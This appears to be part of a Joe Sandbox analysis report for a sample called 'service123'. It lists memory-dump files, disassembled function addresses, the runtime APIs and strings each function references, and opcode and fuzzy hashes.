Memory Dump Source

Source File: 00000004.00000002.2936168593.0000000000531000.00000020.00000001.01000000.00000005.sdmp, Offset: 00530000, based on PE: true

Associated: 00000004.00000002.2936139701.0000000000530000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2936188368.000000000053A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2936205429.000000000053E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2936222214.0000000000541000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_530000_service123.jbxd

Similarity

API ID:
String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.
API String ID: 0-1286557213
Opcode ID: 3aea4562624fe2db10af4335d80e25726ac27f31f4a885f6ca62fb36651fece3
Instruction ID: 4411000fa5f269d73ca84ec96eb54792050111e03f1872da23ab77ca264d9e6e
Opcode Fuzzy Hash: 3aea4562624fe2db10af4335d80e25726ac27f31f4a885f6ca62fb36651fece3
Instruction Fuzzy Hash: 1C81B171A10B068BCB14DF39D89879AFFF1FF95340F059929D894A7354E330E8158B9A

Function 6C2FA850 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 187COMMON

Download Yara Rule

Strings

Unknown pseudo relocation bit size %d., xrefs: 6C2FA9BD
%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p., xrefs: 6C2FA970
Unknown pseudo relocation protocol version %d., xrefs: 6C2FAB43

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID:
String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.
API String ID: 0-1286557213
Opcode ID: cb5fe4ec09572857fed038f6f1db90e6c96ed624df751f7efeb5caaa058750b5
Instruction ID: 498828c1ca8cdaae73f28204bb032ab95d3a4519c1c857037d187afa94b623f7
Opcode Fuzzy Hash: cb5fe4ec09572857fed038f6f1db90e6c96ed624df751f7efeb5caaa058750b5
Instruction Fuzzy Hash: C3716D32A9520ECFDB00CF69C98179EF7B4BB45708F168529ED75ABB44D330E8468B91

Function 005380D8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 19stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 005380F2
strchr.MSVCRT ref: 00538102
atoi.MSVCRT ref: 00538113

Strings

., xrefs: 005380F7

Memory Dump Source

Source File: 00000004.00000002.2936168593.0000000000531000.00000020.00000001.01000000.00000005.sdmp, Offset: 00530000, based on PE: true

Associated: 00000004.00000002.2936139701.0000000000530000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2936188368.000000000053A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2936205429.000000000053E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2936222214.0000000000541000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_530000_service123.jbxd

Similarity

API ID: atoisetlocalestrchr
String ID: .
API String ID: 1223908000-248832578
Opcode ID: ada1008d35e41e10e64cf9da6c6253745884d5c573850742e5c05c36619c67f5
Instruction ID: 07cf2bced503d15293e643c25f9bc94f2627efc07ee7405885e02aaa660e6be0
Opcode Fuzzy Hash: ada1008d35e41e10e64cf9da6c6253745884d5c573850742e5c05c36619c67f5
Instruction Fuzzy Hash: 9EE0ECB19047028AD7487F38C90A33ABFE1BB80300F498C6CF48887245EB799846D752

Function 6C309128 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 19stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 6C309142
strchr.MSVCRT ref: 6C309152
atoi.MSVCRT ref: 6C309163

Strings

., xrefs: 6C309147

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: atoisetlocalestrchr
String ID: .
API String ID: 1223908000-248832578
Opcode ID: 505f93b56d17674917f430adf96e29dc3bbb18f50f8bd546ee062c8e9c381715
Instruction ID: 35a2e24319e3aa7f4b7e8aaebbc7cb784ab62652c9383610f67b8e47aea53538
Opcode Fuzzy Hash: 505f93b56d17674917f430adf96e29dc3bbb18f50f8bd546ee062c8e9c381715
Instruction Fuzzy Hash: 1EE0ECB2B047118AD7047F38C40A39AB6E5BF81308F85886CD4C897745E77DD4499B93

Function 6C309293 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32 ref: 6C30929F
GetProcAddress.KERNEL32 ref: 6C3092B3

Strings

SystemFunction036, xrefs: 6C3092A8
advapi32.dll, xrefs: 6C309298

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: SystemFunction036$advapi32.dll
API String ID: 2574300362-1354007664
Opcode ID: 04e3668aaca8206236f0fc5f7b72b2a2dd51a081a72fb113857cc50586ecde58
Instruction ID: 0cb44fd50ddb070c1966618dc3f60fb45c0e2f8e3f4f1202a26d5a5f09907544
Opcode Fuzzy Hash: 04e3668aaca8206236f0fc5f7b72b2a2dd51a081a72fb113857cc50586ecde58
Instruction Fuzzy Hash: 49E0B6B69993108BCB00BF79960605ABBF4BA06724F01496EE5C997A00E738A554CF97

Function 6C301409 Relevance: 6.5, APIs: 3, Strings: 1, Instructions: 482COMMON

Download Yara Rule

Strings

5, xrefs: 6C3014D2

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID:
String ID: 5
API String ID: 0-2226203566
Opcode ID: 1606b1524a3b4ea4c96587de3dcff6b91bf7734375bd23d04348f1a074da615c
Instruction ID: a4d3ca6c02845b38e02265840748eeb0da57a40576318ec857e4996907ad9aa8
Opcode Fuzzy Hash: 1606b1524a3b4ea4c96587de3dcff6b91bf7734375bd23d04348f1a074da615c
Instruction Fuzzy Hash: 2C22FE76A087408FC724CF69C58465AFBE1BF88308F158A2EE9D897710DB75E844CF82

Function 6C389CD0 Relevance: 6.4, APIs: 2, Strings: 2, Instructions: 366COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 6C389D9C
memset.MSVCRT ref: 6C389DFE

Strings

8O=l0, xrefs: 6C389FA4, 6C389FB0
8O=l0, xrefs: 6C389DA1, 6C389DBD

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: memset
String ID: 8O=l0$8O=l0
API String ID: 2221118986-1811934835
Opcode ID: 8c6c61a0c8e0544c30b55c05c9acc60fbd374ffd534a3d5271cc28357f90b856
Instruction ID: 37268a3786c2af1a4809fa87db9c3248905bc818ec054b7299630f00e8bc995d
Opcode Fuzzy Hash: 8c6c61a0c8e0544c30b55c05c9acc60fbd374ffd534a3d5271cc28357f90b856
Instruction Fuzzy Hash: 9BF1397560A3018FCB11CF29C48064AB7F5FF86318B298A5CE8999B750D736F906CF92

Function 6C2FA340 Relevance: 6.3, APIs: 5, Instructions: 98stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C2FA3C5
memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,6C30C1CC), ref: 6C2FA3E0
free.MSVCRT ref: 6C2FA3EA

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: freememcpystrlen
String ID:
API String ID: 2208669145-0
Opcode ID: 156186e903b184147b3e62f184bc5cf566f9bd88f851cdd214ac75d9819d3552
Instruction ID: 42c829a576370102b28ede95d7dce3973c4f45e79eb2e02faee82a323034f002
Opcode Fuzzy Hash: 156186e903b184147b3e62f184bc5cf566f9bd88f851cdd214ac75d9819d3552
Instruction Fuzzy Hash: E8315B7269971ECBD3009E29D48461BFBE1AFC1759F210A2CEDF487B40D3B1D4468B92

Function 6C3459F0 Relevance: 6.3, APIs: 2, Strings: 2, Instructions: 308COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 6C345B24
memchr.MSVCRT ref: 6C345B43

Part of subcall function 6C3B82D0: setlocale.MSVCRT ref: 6C3B82E5

Strings

-, xrefs: 6C345D22
., xrefs: 6C345B35

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: memchrmemcpysetlocale
String ID: -$.
API String ID: 4291329590-3807043784
Opcode ID: 9cd9c5b2f4542db21f9739b2ec05cc2370bd51c1c6bdbbacd30cf6f044f26354
Instruction ID: 3390ba819b0f16d9d2abb4961285b2728911e5c2ba6e9524da261373f777e6b5
Opcode Fuzzy Hash: 9cd9c5b2f4542db21f9739b2ec05cc2370bd51c1c6bdbbacd30cf6f044f26354
Instruction Fuzzy Hash: A5D105B5D047199FCB00DFA8C48458EBBF1BF48314F148A2AE8A4AB755D734D945CF92

Function 6C345E30 Relevance: 6.3, APIs: 2, Strings: 2, Instructions: 306COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 6C345F5E
memchr.MSVCRT ref: 6C345F7D

Part of subcall function 6C3B82D0: setlocale.MSVCRT ref: 6C3B82E5

Strings

., xrefs: 6C345F6F
6, xrefs: 6C346166

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: memchrmemcpysetlocale
String ID: .$6
API String ID: 4291329590-4089497287
Opcode ID: fab5bfcf50f364ee1b37f478d51a53362c52461838be3050e9093fe03a4d5de4
Instruction ID: a203fd1deeeca2e2e52c1be831dd695e2e16d7cbfbfa827aceb62f3bfc4f6150
Opcode Fuzzy Hash: fab5bfcf50f364ee1b37f478d51a53362c52461838be3050e9093fe03a4d5de4
Instruction Fuzzy Hash: CCD116B5D093599FCB00DFA8C48068EBBF1AF88314F14866AE8A4EB751D734D945CF92

Function 6C3C0D40 Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 283stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C3C0D85

Strings

basic_string::append, xrefs: 6C3C0DFD, 6C3C0E09, 6C3C0EFC, 6C3C0FBC

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: strlen
String ID: basic_string::append
API String ID: 39653677-3811946249
Opcode ID: 3b781a8a0fff8cc65c1b604b7d554591061364a23d50aaf958ea7f76bf9d97a9
Instruction ID: 658683a929ac33fd1fabb50bc2155fd5297c684f2b2d694cc32dd68c14a0dfae
Opcode Fuzzy Hash: 3b781a8a0fff8cc65c1b604b7d554591061364a23d50aaf958ea7f76bf9d97a9
Instruction Fuzzy Hash: 65A144B5A042448FCB00EF29C58469EBBF5FF89354F108969E8989B744E734E849CF93

Function 6C35B080 Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 153COMMON

Download Yara Rule

APIs

memmove.MSVCRT(00000000,?,?,6C35972F), ref: 6C35B0E6
memcpy.MSVCRT(?,?,?,?,?,?,6C35972F), ref: 6C35B151
memcpy.MSVCRT(00000000,?,?,6C35972F), ref: 6C35B198

Strings

basic_string::assign, xrefs: 6C35B1B3

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: memcpy$memmove
String ID: basic_string::assign
API String ID: 1283327689-2385367300
Opcode ID: 4c1572a6b68cf455f4799c273ae776fd40ff08395e115fffc8ebdcaa33e2e534
Instruction ID: 9ed54f7a552d998d1394ae99ffe68130e0341d5918578413e90c923fe250f3a4
Opcode Fuzzy Hash: 4c1572a6b68cf455f4799c273ae776fd40ff08395e115fffc8ebdcaa33e2e534
Instruction Fuzzy Hash: 87519A71B0A6118BD7009F2DC884A5EF7E5FF8530CB90862DE4958F714E7329915CF92

Function 6C3641C0 Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 150COMMON

Download Yara Rule

APIs

memmove.MSVCRT ref: 6C364221
memcpy.MSVCRT ref: 6C36428F
memcpy.MSVCRT ref: 6C3642C8

Strings

basic_string::assign, xrefs: 6C3642E4

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: memcpy$memmove
String ID: basic_string::assign
API String ID: 1283327689-2385367300
Opcode ID: 7d19ad6a8f7e8a91f1cc93eec43c627f6f72dc0a3d4abc37358ac942672c761d
Instruction ID: 36fbbdeab6070240250777095d19ab20eb88496fd2022ed25580cc95c4f7120e
Opcode Fuzzy Hash: 7d19ad6a8f7e8a91f1cc93eec43c627f6f72dc0a3d4abc37358ac942672c761d
Instruction Fuzzy Hash: 02517A71B0A6118FD701DF2AD49465EFBF5AF96308F608A6DE4948BB18E331D805CF92

Function 6C31E730 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 127stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C31E75A
wcslen.MSVCRT ref: 6C31E7CA

Strings

basic_string: construction from null is not valid, xrefs: 6C31E792, 6C31E802, 6C31E872

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: strlenwcslen
String ID: basic_string: construction from null is not valid
API String ID: 803329031-2991274800
Opcode ID: 98fbb89960fc7837277eb29f9c6cbe40d4b0a164a7c91a6716d2ac92c4eaf177
Instruction ID: 50241e2adfd56e2efd4ce44e862958534d5429940aa9a41afe59ea2566d2c666
Opcode Fuzzy Hash: 98fbb89960fc7837277eb29f9c6cbe40d4b0a164a7c91a6716d2ac92c4eaf177
Instruction Fuzzy Hash: 4C4180F6A097108FC704AF2CD48584ABBA0BF54714F564969D8848BB15E332E995CFD2

Function 6C31E331 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 115stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C31E35D
strlen.MSVCRT ref: 6C31E3AD

Strings

basic_string: construction from null is not valid, xrefs: 6C31E37F, 6C31E3CF, 6C31E41F

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: strlen
String ID: basic_string: construction from null is not valid
API String ID: 39653677-2991274800
Opcode ID: 498b31379cc1d7db5115918771c2bd85a605e218786bf37c4c0230ccdc809e48
Instruction ID: c52bb3ca1044d5e66b430c00aa84a45ef284cd1fed06a96a32330910a5273cdf
Opcode Fuzzy Hash: 498b31379cc1d7db5115918771c2bd85a605e218786bf37c4c0230ccdc809e48
Instruction Fuzzy Hash: 733146B26153548FCB00BF2CC48549ABBE4BF15618B06496DE9C49B711D736EC49CF93

Function 00537C40 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

IsDBCSLeadByteEx.KERNEL32 ref: 00537C92
MultiByteToWideChar.KERNEL32 ref: 00537CD5

Memory Dump Source

Source File: 00000004.00000002.2936168593.0000000000531000.00000020.00000001.01000000.00000005.sdmp, Offset: 00530000, based on PE: true

Associated: 00000004.00000002.2936139701.0000000000530000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2936188368.000000000053A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2936205429.000000000053E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2936222214.0000000000541000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_530000_service123.jbxd

Similarity

API ID: Byte$CharLeadMultiWide
String ID:
API String ID: 2561704868-0
Opcode ID: dfad3792b35957526584a0e379b781a43c853fc9c723ab3c1593d3f7eadd852b
Instruction ID: 8901c79fb00a3abb80b138c9b745f573ab4708ab4c32e779cb835415c6fdddd2
Opcode Fuzzy Hash: dfad3792b35957526584a0e379b781a43c853fc9c723ab3c1593d3f7eadd852b
Instruction Fuzzy Hash: 9031E2B090D3458FD720DF28D58466ABFE0BF8A314F048D1DE8948B390E7B6D849DB92

Function 6C309660 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

IsDBCSLeadByteEx.KERNEL32 ref: 6C3096B2
MultiByteToWideChar.KERNEL32 ref: 6C3096F5

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: Byte$CharLeadMultiWide
String ID:
API String ID: 2561704868-0
Opcode ID: 48911e8524fcc59b068c477dcbde30a9627103189904aee2b8c10e68d99c37b2
Instruction ID: b580bc0c3202404c3086b94e272052f4f9d794ef6759e2d3ed14c86130569313
Opcode Fuzzy Hash: 48911e8524fcc59b068c477dcbde30a9627103189904aee2b8c10e68d99c37b2
Instruction Fuzzy Hash: 6C31F2B66093418FD700DF29E18425ABBF0BF8A719F14892DE8D48B651E3B6D948CF53

Function 6C2FF511 Relevance: 6.1, APIs: 4, Instructions: 91COMMON

Download Yara Rule

APIs

ReleaseSemaphore.KERNEL32 ref: 6C2FF5C1

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: ReleaseSemaphore
String ID:
API String ID: 452062969-0
Opcode ID: fa4f4fe3ffed0a83b080aafa559989ab4e29ca9fc14af5b02c75614eb4edd39f
Instruction ID: bff0773710c6f919e5f08a6ae4cfd7fc60f86d22fe66495be7b4420c2c342c7f
Opcode Fuzzy Hash: fa4f4fe3ffed0a83b080aafa559989ab4e29ca9fc14af5b02c75614eb4edd39f
Instruction Fuzzy Hash: 97415870A8930A8FDB00EF29D58475BBBF4BB46318F15861CECA84BA54D731E546CB92

Function 6C2FF6B0 Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

ReleaseSemaphore.KERNEL32 ref: 6C2FF751

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
